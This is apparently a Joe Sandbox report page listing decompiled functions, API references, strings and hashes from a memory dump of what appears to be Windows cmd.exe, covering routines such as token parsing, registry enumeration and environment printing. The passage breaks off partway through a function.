0x00000000
0x00000000
0x00d8f1ff
0x00d8f21a
0x00d8f21a
0x00d8f201
0x00d8f201
0x00d8f201
0x00d8f205
0x00d8f209
0x00000000
0x00d8f20f
0x00d8f20f
0x00d8f212
0x00d8f218
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f218
0x00d8f209
0x00d8f21c
0x00d8f21e
0x00000000
0x00d8f230
0x00d8f230
0x00d8f230
0x00d8f232
0x00d8f237
0x00d8f243
0x00d8f247
0x00d8f254
0x00000000
0x00d8f25a
0x00d8f25a
0x00d8f25f
0x00d8f269
0x00d8f26d
0x00d9c4c9
0x00d9c4d5
0x00d9c4db
0x00d9c4dc
0x00d9c4e7
0x00d8f43d
0x00d8f44a
0x00d8f273
0x00d8f278
0x00d8f27a
0x00d8f27d
0x00d8f287
0x00d8f28c
0x00d8f28f
0x00d8f29f
0x00d8f2ea
0x00d8f2f0
0x00d8f2a1
0x00d8f2a1
0x00d8f2a1
0x00d8f2a9
0x00d8f2bb
0x00d8f2bb
0x00d8f26d
0x00d8f254
0x00000000
0x00d8f21e
0x00d8f2c8
0x00d8f2ca
0x00000000
0x00d8f1a2
0x00d8f1a2
0x00d8f1a4
0x00d8f1a8
0x00000000
0x00d8f1a8
0x00d8f1a0
0x00000000
0x00d8f18e
0x00d8f2be
0x00d8f2c0
0x00000000
0x00d8f2c0
0x00000000

Strings

Ungetting: '%s', xrefs: 00D9C4E2
GeToken: (%x) '%s', xrefs: 00D9C4B7

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID:
String ID: GeToken: (%x) '%s'$Ungetting: '%s'
API String ID: 0-1704545398
Opcode ID: a308c77c64264ffc37fed8f9c7f16b8adb5da0a6546e4dbf648920eaa41fb6b3
Instruction ID: 279fdb58758dbe04e55e70b0ac51f8bbd4cfec20ef6f0d57b1ac85c80bef55da
Opcode Fuzzy Hash: a308c77c64264ffc37fed8f9c7f16b8adb5da0a6546e4dbf648920eaa41fb6b3
Instruction Fuzzy Hash: D5511132A00301DFDB28BB68DC193BA76A2EB91754F58813AE847C7391EB719C41C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4159, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00DA4159(signed int __ecx, wchar_t* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				long _t29;
				void* _t30;
				void* _t32;
				int _t36;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				long _t45;
				long _t46;
				signed int _t48;
				wchar_t* _t52;
				int _t55;
				signed int _t59;
				void* _t64;
				long* _t66;
				intOrPtr _t69;
				long* _t73;
				void* _t77;
				void* _t78;
				void* _t79;
				wchar_t* _t81;
				signed int _t83;
				signed int _t84;
				void* _t85;

				_t26 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t26 ^ _t84;
				_v32 = __ecx;
				_v28 = _a4;
				_t52 = __edx;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 = 0;
				_v24 = __ecx + 8;
				_t77 = 0;
				while(1) {
					_t81 = _t52;
					_t8 =  &(_t81[0]); // 0x2
					_t73 = _t8;
					do {
						_t29 =  *_t81;
						_t81 =  &(_t81[0]);
					} while (_t29 != _t55);
					_t83 = _t81 - _t73 >> 1;
					if(_t83 > 2 || iswdigit( *_t52 & 0x0000ffff) == 0) {
						L16:
						_t74 =  *_t52 & 0x0000ffff;
						if(( *_t52 & 0x0000ffff) == 0) {
							goto L31;
						} else {
							if(E00D8D7D4( &_v20, _t74) == 0) {
								goto L11;
							} else {
								goto L18;
							}
						}
					} else {
						_t45 = _t52[0] & 0x0000ffff;
						if(_t45 == 0 || iswdigit(_t45) != 0) {
							_t46 = wcstol(_t52, 0, 0xa);
							_t66 = _v24;
							_t52 = _t52 + _t83 * 2 + 2;
							_t85 = _t85 + 0xc;
							 *_t66 = _t46;
							_t74 =  *_t52 & 0x0000ffff;
							_v24 =  &(_t66[0]);
							if(( *_t52 & 0x0000ffff) == 0) {
								L31:
								_t77 = _t77 + 1;
								_t30 = 4;
								if(_t77 < _t30) {
									_t78 = _v24;
									_t59 = _t30 - _t77 >> 1;
									_t36 = memset(_t78, 0, _t59 << 2);
									_t79 = _t78 + _t59;
									asm("adc ecx, ecx");
									memset(_t79, _t36, 0);
									_t77 = _t79;
								}
								_t32 = 1;
							} else {
								if(E00D8D7D4( &_v20, _t74) != 0) {
									L18:
									_t39 =  *_t52 & 0x0000ffff;
									if(_t39 == 0x70 || _t39 == 0x50) {
										_t64 = 1;
									} else {
										_t64 = 0;
									}
									_t40 = _t52[1] & 0x0000ffff;
									if(_t40 == 0 || _t40 == 0x6d || _t40 == 0x4d) {
										_t74 = _v32;
										_t41 =  *(_t74 + 8) & 0x0000ffff;
										if(_t64 == 0) {
											if(_t41 == 0xc) {
												_t42 = 0;
												goto L30;
											}
										} else {
											if(_t41 != 0xc) {
												_t42 = _t41 + 0xc;
												L30:
												 *(_t74 + 8) = _t42;
											}
										}
										goto L31;
									} else {
										goto L11;
									}
								} else {
									_t48 =  *_t52 & 0x0000ffff;
									_t69 = _v28;
									if(_t77 >= 2) {
										if(_t48 ==  *((intOrPtr*)(_t69 + 2)) || _t48 ==  *((intOrPtr*)(_t69 + 6))) {
											goto L14;
										} else {
											goto L11;
										}
									} else {
										_t74 = _t48;
										if(E00D8D7D4(_t69, _t48) != 0) {
											L14:
											_t77 = _t77 + 1;
											_t52 = E00D8D7E6(_t52);
											if(_t77 >= 4) {
												goto L16;
											} else {
												_t55 = 0;
												continue;
											}
										} else {
											L11:
											_t32 = 0;
										}
									}
								}
							}
						} else {
							goto L16;
						}
					}
					return E00D96FD0(_t32, _t52, _v8 ^ _t84, _t74, _t77, _t83);
				}
			}

0x00da4161
0x00da4168
0x00da4176
0x00da417c
0x00da417f
0x00da4181
0x00da4182
0x00da4183
0x00da4188
0x00da418a
0x00da418d
0x00da418f
0x00da418f
0x00da4191
0x00da4191
0x00da4194
0x00da4194
0x00da4197
0x00da419a
0x00da41a1
0x00da41a6
0x00da424b
0x00da424b
0x00da4251
0x00000000
0x00da4253
0x00da425d
0x00000000
0x00000000
0x00000000
0x00000000
0x00da425d
0x00da41bf
0x00da41bf
0x00da41c6
0x00da41d9
0x00da41df
0x00da41e5
0x00da41e8
0x00da41eb
0x00da41f1
0x00da41f4
0x00da41fa
0x00da42a6
0x00da42a8
0x00da42a9
0x00da42ac
0x00da42b0
0x00da42b7
0x00da42b9
0x00da42b9
0x00da42bb
0x00da42bd
0x00da42bd
0x00da42bd
0x00da42c2
0x00da4200
0x00da420a
0x00da425f
0x00da425f
0x00da4265
0x00da4272
0x00da426c
0x00da426c
0x00da426c
0x00da4273
0x00da427a
0x00da4286
0x00da4289
0x00da428f
0x00da429e
0x00da42a0
0x00000000
0x00da42a0
0x00da4291
0x00da4294
0x00da4296
0x00da42a2
0x00da42a2
0x00da42a2
0x00da4294
0x00000000
0x00000000
0x00000000
0x00000000
0x00da420c
0x00da420c
0x00da420f
0x00da4215
0x00da422d
0x00000000
0x00000000
0x00000000
0x00000000
0x00da4217
0x00da4217
0x00da4220
0x00da4235
0x00da4237
0x00da423d
0x00da4242
0x00000000
0x00da4244
0x00da4244
0x00000000
0x00da4244
0x00da4222
0x00da4222
0x00da4222
0x00da4222
0x00da4220
0x00da4215
0x00da420a
0x00000000
0x00000000
0x00000000
0x00da41c6
0x00da42d3
0x00da42d3

APIs

iswdigit.MSVCRT ref: 00DA41B0
iswdigit.MSVCRT ref: 00DA41C9
wcstol.MSVCRT ref: 00DA41D9

Strings

aApP, xrefs: 00DA4171

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: iswdigit$wcstol
String ID: aApP
API String ID: 644763121-2547155087
Opcode ID: a3c7018b931b08756ac73a0ed3a6a63af0110073a267e528eab43c43593fc09a
Instruction ID: 8f0b916276bfcee18974c18bbcb12e3b335a99acbb3d784909bae9c7b09045d4
Opcode Fuzzy Hash: a3c7018b931b08756ac73a0ed3a6a63af0110073a267e528eab43c43593fc09a
Instruction Fuzzy Hash: ED41D175A0021286CF249F68D89577EB3A5EFD7301B18442AFD46DB284E7B0DD42C379

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4B4E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00DA4B4E(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t24;
				signed int _t26;
				signed int _t31;
				void* _t39;
				void* _t42;
				int _t43;
				signed int _t53;
				signed int _t54;
				int _t59;
				void* _t64;
				int* _t66;
				void* _t67;
				void* _t69;
				signed int _t70;
				void* _t71;
				void* _t80;

				_t63 = __edx;
				_t19 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t19 ^ _t70;
				_t67 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					_t43 = E00D8DF40(E00D8DEF9(__edx));
					__eflags = _t43;
					if(_t43 == 0) {
						L14:
						_t24 = 1;
						L28:
						__eflags = _v8 ^ _t70;
						return E00D96FD0(_t24, _t43, _v8 ^ _t70, _t63, _t66, _t67);
					}
					_t64 = 0x20;
					_t26 = E00D92349(_t43, _t64);
					__eflags = _t26;
					if(__eflags != 0) {
						__eflags = 0;
						 *_t26 = 0;
					}
					_t50 = _t67;
					_t63 = E00DA5662(_t43, _t67, _t43, _t66, _t67, __eflags);
					_v532 = _t63;
					__eflags = _t63;
					if(_t63 == 0) {
						L25:
						_t67 = 1;
						__eflags = 1;
						E00D8C5A2(_t50, 0x400023a3, 1, _t43);
						goto L26;
					} else {
						_t53 = _t63;
						_t66 = 0;
						__eflags = 0;
						_t16 = _t53 + 2; // 0x2
						_t69 = _t16;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
							__eflags = _t31;
						} while (_t31 != 0);
						_t54 = _t53 - _t69;
						__eflags = _t54;
						_t50 = _t54 >> 1;
						if(_t54 == 0) {
							goto L25;
						}
						_push(_t63);
						_push(_t43);
						_t67 = E00D925D9(L"%s=%s\r\n");
						L26:
						E00D90040(_v532);
						E00D90040(_t43);
						L27:
						_t24 = _t67;
						goto L28;
					}
				}
				_t66 = 0;
				_t43 = 0;
				_v536 = 0;
				while(1) {
					_v540 = 0x104;
					_t67 = RegEnumKeyExW(_t67, _t43,  &_v528,  &_v540, _t66, _t66, _t66, _t66);
					if(_t67 != 0) {
						break;
					}
					_t76 = _v528 - 0x2e;
					if(_v528 != 0x2e) {
						L10:
						_t80 =  *0xdad544 - _t66; // 0x0
						if(_t80 != 0) {
							goto L14;
						}
						_t43 = _t43 + 1;
						_v536 = _t43;
						if(_t67 != 0) {
							goto L27;
						}
						_t67 = _v532;
						continue;
					}
					_t56 = _v532;
					_t63 =  &_v528;
					_t43 = E00DA5662(_t43, _v532,  &_v528, _t66, _t67, _t76);
					if(_t43 == 0) {
						_push(_t66);
						_push(GetLastError());
						E00D8C5A2(_t56);
						goto L14;
					}
					_t59 = _t43;
					_t10 = _t59 + 2; // 0x2
					_t63 = _t10;
					do {
						_t39 =  *_t59;
						_t59 = _t59 + 2;
					} while (_t39 != _t66);
					if(_t59 != _t63) {
						_push(_t43);
						_push( &_v528);
						_t42 = E00D925D9(L"%s=%s\r\n");
						_t71 = _t71 + 0xc;
						_t67 = _t42;
					}
					E00D90040(_t43);
					_t43 = _v536;
					goto L10;
				}
				__eflags = _t67 - 0x103;
				if(_t67 == 0x103) {
					_t67 = _t66;
				}
				goto L27;
			}

0x00da4b4e
0x00da4b59
0x00da4b60
0x00da4b65
0x00da4b67
0x00da4b70
0x00da4c63
0x00da4c65
0x00da4c67
0x00da4c3a
0x00da4c3c
0x00da4cdf
0x00da4ce4
0x00da4cef
0x00da4cef
0x00da4c6b
0x00da4c6e
0x00da4c73
0x00da4c75
0x00da4c77
0x00da4c79
0x00da4c79
0x00da4c7e
0x00da4c85
0x00da4c87
0x00da4c8d
0x00da4c8f
0x00da4cb9
0x00da4cbc
0x00da4cbc
0x00da4cc3
0x00000000
0x00da4c91
0x00da4c91
0x00da4c93
0x00da4c93
0x00da4c95
0x00da4c95
0x00da4c98
0x00da4c98
0x00da4c9b
0x00da4c9e
0x00da4c9e
0x00da4ca3
0x00da4ca3
0x00da4ca5
0x00da4ca7
0x00000000
0x00000000
0x00da4ca9
0x00da4caa
0x00da4cb5
0x00da4cc8
0x00da4cd1
0x00da4cd8
0x00da4cdd
0x00da4cdd
0x00000000
0x00da4cdd
0x00da4c8f
0x00da4b76
0x00da4b78
0x00da4b7a
0x00da4b80
0x00da4b8a
0x00da4ba4
0x00da4ba8
0x00000000
0x00000000
0x00da4bae
0x00da4bb6
0x00da4c09
0x00da4c09
0x00da4c0f
0x00000000
0x00000000
0x00da4c11
0x00da4c12
0x00da4c1a
0x00000000
0x00000000
0x00da4c20
0x00000000
0x00da4c20
0x00da4bb8
0x00da4bbe
0x00da4bc9
0x00da4bcd
0x00da4c2b
0x00da4c32
0x00da4c33
0x00000000
0x00da4c39
0x00da4bcf
0x00da4bd1
0x00da4bd1
0x00da4bd4
0x00da4bd4
0x00da4bd7
0x00da4bda
0x00da4be3
0x00da4be5
0x00da4bec
0x00da4bf2
0x00da4bf7
0x00da4bfa
0x00da4bfa
0x00da4bfe
0x00da4c03
0x00000000
0x00da4c03
0x00da4c42
0x00da4c48
0x00da4c4e
0x00da4c4e
0x00000000

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00DA4B9E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00DA4C2C

Strings

%s=%s, xrefs: 00DA4BED, 00DA4CAB
., xrefs: 00DA4BAE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: EnumErrorLast
String ID: %s=%s$.
API String ID: 1967352920-4275322459
Opcode ID: 62cf1d26ab2dae530bdff1a3a8b222d3fb5db0535a1e8f0634c5b3430a724407
Instruction ID: 57584832434fb08c5323f5665509fb487fec5e7a41f061bfa5805975c65f47c2
Opcode Fuzzy Hash: 62cf1d26ab2dae530bdff1a3a8b222d3fb5db0535a1e8f0634c5b3430a724407
Instruction Fuzzy Hash: 88414D72E0121997CF34AB659C95ABB7369DFD1320F1841A9E80F97241DEF08E4187B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D962FA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00D96367
_wcsnicmp.MSVCRT ref: 00D9F6F6

Strings

/-Y, xrefs: 00D9F6F0
COPYCMD, xrefs: 00D96314

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsnicmp
String ID: /-Y$COPYCMD
API String ID: 1886669725-617350906
Opcode ID: ac092bc3143b7f616ab5af43c8bd101a8a99ed641fce3b53e09144a1b06821bb
Instruction ID: f5ea8362f1fd709717bc4e658d69beb5ef5ab05ca1a73c7574c77cd042b917d7
Opcode Fuzzy Hash: ac092bc3143b7f616ab5af43c8bd101a8a99ed641fce3b53e09144a1b06821bb
Instruction Fuzzy Hash: C9215B72A00312ABDF289B5A9C496BABAF5EF85354B5D0069F889D7350FB70DD01C370

Uniqueness

Uniqueness Score: -1.00%

Function 00DAAB79, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00DAAB79(void* __ecx, char* __edx, signed char* _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				char* _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				void* _t39;
				char _t42;
				void* _t44;
				intOrPtr _t47;
				void* _t59;
				signed int _t61;

				_t58 = __edx;
				_t25 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t25 ^ _t61;
				_v28 = _v28 & 0x00000000;
				_t60 = 0x104;
				_v552 = __edx;
				_v20 = 0x104;
				_t46 = 1;
				_t59 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t37 = _a4;
					_t60 = L"%s";
					if(( *_a4 & 0x00000010) != 0) {
						_t60 = L"[%s]";
					}
					_t39 = E00D90D89(_t58, _t37 + 0x2c);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t47 = _v552;
					E00D96810(_t39, _t54, _t47);
					if(_t47 < 0) {
						_t44 = _v28;
						if(_t44 == 0) {
							_t44 =  &_v548;
						}
						__imp___wcslwr(_t44);
					}
					_t41 = _v28;
					if(_v28 == 0) {
						_t41 =  &_v548;
					}
					_t58 = _t60;
					_t42 = E00D96B76(_t59, _t60, _t41);
					_t46 = _t42;
					if(_t42 == 0) {
						_t46 = E00DA7D7D(_t59);
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t46, _t46, _v8 ^ _t61, _t58, _t59, _t60, _v28);
			}

0x00daab79
0x00daab84
0x00daab8b
0x00daab8e
0x00daab9b
0x00daaba0
0x00daaba9
0x00daabae
0x00daabaf
0x00daabb2
0x00daabb5
0x00daabdb
0x00daabdd
0x00daabe0
0x00daabe8
0x00daabea
0x00daabea
0x00daabf9
0x00daabfe
0x00daac03
0x00daac05
0x00daac05
0x00daac0b
0x00daac12
0x00daac19
0x00daac1b
0x00daac20
0x00daac22
0x00daac22
0x00daac29
0x00daac2f
0x00daac30
0x00daac35
0x00daac37
0x00daac37
0x00daac3e
0x00daac42
0x00daac47
0x00daac4b
0x00daac54
0x00daac54
0x00daac4b
0x00daac59
0x00daac72

APIs

memset.MSVCRT ref: 00DAABB5

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

_wcslwr.MSVCRT ref: 00DAAC29
??_V@YAXPAX@Z.MSVCRT ref: 00DAAC59

Strings

[%s], xrefs: 00DAABEA

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$_wcslwr
String ID: [%s]
API String ID: 886762496-302437576
Opcode ID: 13ce93b8326f947ff3a611f08fa7509a695de488481eab9fb9e55bafd3c3a41e
Instruction ID: f99dc13237af902496864d85bd44f8dff8c05ee090611e144305dd7a489eadb6
Opcode Fuzzy Hash: 13ce93b8326f947ff3a611f08fa7509a695de488481eab9fb9e55bafd3c3a41e
Instruction Fuzzy Hash: 99219671A002199BDF14EBA8DD85BBEBBB8EF19314F0801A9E505D3241EB74DE44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D923A9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00D92430: iswspace.MSVCRT ref: 00D92440

iswspace.MSVCRT ref: 00D923C8
_wcsnicmp.MSVCRT ref: 00D92419

Strings

off, xrefs: 00D92413

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: iswspace$_wcsnicmp
String ID: off
API String ID: 3989682491-733764931
Opcode ID: f273e310d1276ac6126ceb33d139b0e0439ff8bd888c20afb7232d12832e2d03
Instruction ID: 53df67e8571ab42b2bcff68c73fc842ee97565317f268e41aa9a01456a644175
Opcode Fuzzy Hash: f273e310d1276ac6126ceb33d139b0e0439ff8bd888c20afb7232d12832e2d03
Instruction Fuzzy Hash: 4B112B31700213B7EF25226E6C9BB7E5254DBA0B65B2D012EFC86E61C1EE08CD0191B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4506, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00DA4506(intOrPtr* __ecx) {
				void* _t5;
				signed int _t6;
				signed int _t8;
				signed int _t9;
				void* _t19;
				signed int _t23;
				intOrPtr* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;

				_t23 = __ecx;
				if(__ecx != 0) {
					_t26 = __ecx;
					__eflags = 0;
					_t19 = __ecx + 2;
					do {
						_t6 =  *_t26;
						_t26 = _t26 + 2;
						__eflags = _t6;
					} while (_t6 != 0);
					while(1) {
						_t27 = _t26 - _t19;
						__eflags = _t27;
						_t28 = _t27 >> 1;
						if(_t27 == 0) {
							break;
						}
						__eflags =  *0xdad544; // 0x0
						if(__eflags != 0) {
							_t8 = 1;
						} else {
							__eflags =  *_t23 - 0x3d;
							if( *_t23 != 0x3d) {
								_push(_t23);
								E00D925D9(L"%s\r\n");
							}
							_t23 = _t23 + _t28 * 2 + 2;
							__eflags = _t23;
							_t30 = _t23;
							_t19 = _t30 + 2;
							do {
								_t9 =  *_t30;
								_t30 = _t30 + 2;
								__eflags = _t9;
							} while (_t9 != 0);
							continue;
						}
						L12:
						return _t8;
						goto L14;
					}
					_t8 = 0;
					__eflags = 0;
					goto L12;
				} else {
					_push("Null environment");
					fprintf(E00D97721(_t5, 2), "\nCMD Internal Error %s\n");
					return 1;
				}
				L14:
			}

0x00da4509
0x00da450d
0x00da4532
0x00da4534
0x00da4536
0x00da4539
0x00da4539
0x00da453c
0x00da453f
0x00da453f
0x00da4577
0x00da4577
0x00da4577
0x00da4579
0x00da457b
0x00000000
0x00000000
0x00da4546
0x00da454c
0x00da4585
0x00da454e
0x00da454e
0x00da4552
0x00da4554
0x00da455a
0x00da4560
0x00da4564
0x00da4564
0x00da4567
0x00da4569
0x00da456c
0x00da456c
0x00da456f
0x00da4572
0x00da4572
0x00000000
0x00da456c
0x00da457f
0x00da4582
0x00000000
0x00da4582
0x00da457d
0x00da457d
0x00000000
0x00da450f
0x00da450f
0x00da4522
0x00da452f
0x00da452f
0x00000000

APIs

Part of subcall function 00D97721: __iob_func.MSVCRT ref: 00D97726

fprintf.MSVCRT ref: 00DA4522

Strings

%s, xrefs: 00DA4555
Null environment, xrefs: 00DA450F
CMD Internal Error %s, xrefs: 00DA4514

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 620453056-2781220306
Opcode ID: 19ddd6cc62b55b1656d00af8706bb04eee2ac01600148c0efce54f5970e7c6b4
Instruction ID: b0188fbd115d5e20c40cbfcd1617be08a1d83d415ddfc13e19a6e569bd0f0aa5
Opcode Fuzzy Hash: 19ddd6cc62b55b1656d00af8706bb04eee2ac01600148c0efce54f5970e7c6b4
Instruction Fuzzy Hash: 5601DB77D443119FCB347B9C7C56872B354DAD272031D092AEC9A93644FBE06D468570

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2950, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00DA2950(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				void* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t3 ^ _t20;
				_t18 =  *0xdc80a0;
				if(_t18 != 0) {
					L5:
					 *0xdc94b4();
					_t6 =  *_t18();
				} else {
					_t8 =  *0xdad530; // 0x0
					if(_t8 == 0) {
						_t8 = GetModuleHandleW(L"ntdll.dll");
						 *0xdad530 = _t8;
					}
					_t18 = GetProcAddress(_t8, "RtlDllShutdownInProgress");
					 *0xdc80a0 = _t18;
					if(_t18 != 0) {
						goto L5;
					} else {
						_t6 = 0;
					}
				}
				_pop(_t19);
				return E00D96FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}

0x00da2955
0x00da2956
0x00da295d
0x00da2961
0x00da2969
0x00da29a0
0x00da29a2
0x00da29a8
0x00da296b
0x00da296b
0x00da2972
0x00da2979
0x00da297f
0x00da297f
0x00da2990
0x00da2992
0x00da299a
0x00000000
0x00da299c
0x00da299c
0x00da299c
0x00da299a
0x00da29af
0x00da29b8

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00DA2979
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00DA298A

Strings

RtlDllShutdownInProgress, xrefs: 00DA2984
ntdll.dll, xrefs: 00DA2974

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlDllShutdownInProgress$ntdll.dll
API String ID: 1646373207-582119455
Opcode ID: 749ff6fb29e0328c3cd872ec0b9338afe045201bdbd6dc299e7a13a4f79854cd
Instruction ID: 9e8485519269d1c569a22bec4009dc7f1047ea59e8eaea138e13429114753863
Opcode Fuzzy Hash: 749ff6fb29e0328c3cd872ec0b9338afe045201bdbd6dc299e7a13a4f79854cd
Instruction Fuzzy Hash: 41F09031A5032ADF8B109F29AD1AE7B77E8EB46B54B440699FC06D3310DB209D019BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D888D8, Relevance: 6.2, APIs: 4, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00D888D8(void* __ecx) {
				signed int _v8;
				void* _v12;
				int _v20;
				signed int _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void _v548;
				void* _v552;
				void* _v556;
				void* _v560;
				int _v564;
				int _v568;
				int _v572;
				char _v576;
				char _v580;
				int _v584;
				int _v588;
				void* _v592;
				void* _v596;
				void* _v602;
				int _v606;
				int _v610;
				int _v614;
				int _v618;
				int _v622;
				int _v626;
				int _v630;
				int _v634;
				short _v636;
				int _v640;
				int _v644;
				int _v648;
				int _v652;
				signed int _v656;
				char _v660;
				signed int _v664;
				char _v668;
				void* _v676;
				void* _v680;
				void* _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t64;
				intOrPtr _t79;
				signed int _t82;
				long _t87;
				long _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr* _t106;
				signed int _t107;
				void* _t116;
				intOrPtr _t118;
				WCHAR** _t119;
				void* _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;

				_t127 = (_t125 & 0xfffffff8) - 0x29c;
				_t64 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t64 ^ _t127;
				_v24 = 1;
				_v644 = 0;
				_t93 = __ecx;
				_v636 = 0;
				_v660 = 0;
				_v656 = 0;
				_v652 = 0;
				_v648 = 0;
				_v640 = 0;
				_v634 = 0;
				_v630 = 0;
				_v626 = 0;
				_v622 = 0;
				_v618 = 0;
				_v614 = 0;
				_v610 = 0;
				_v606 = 0;
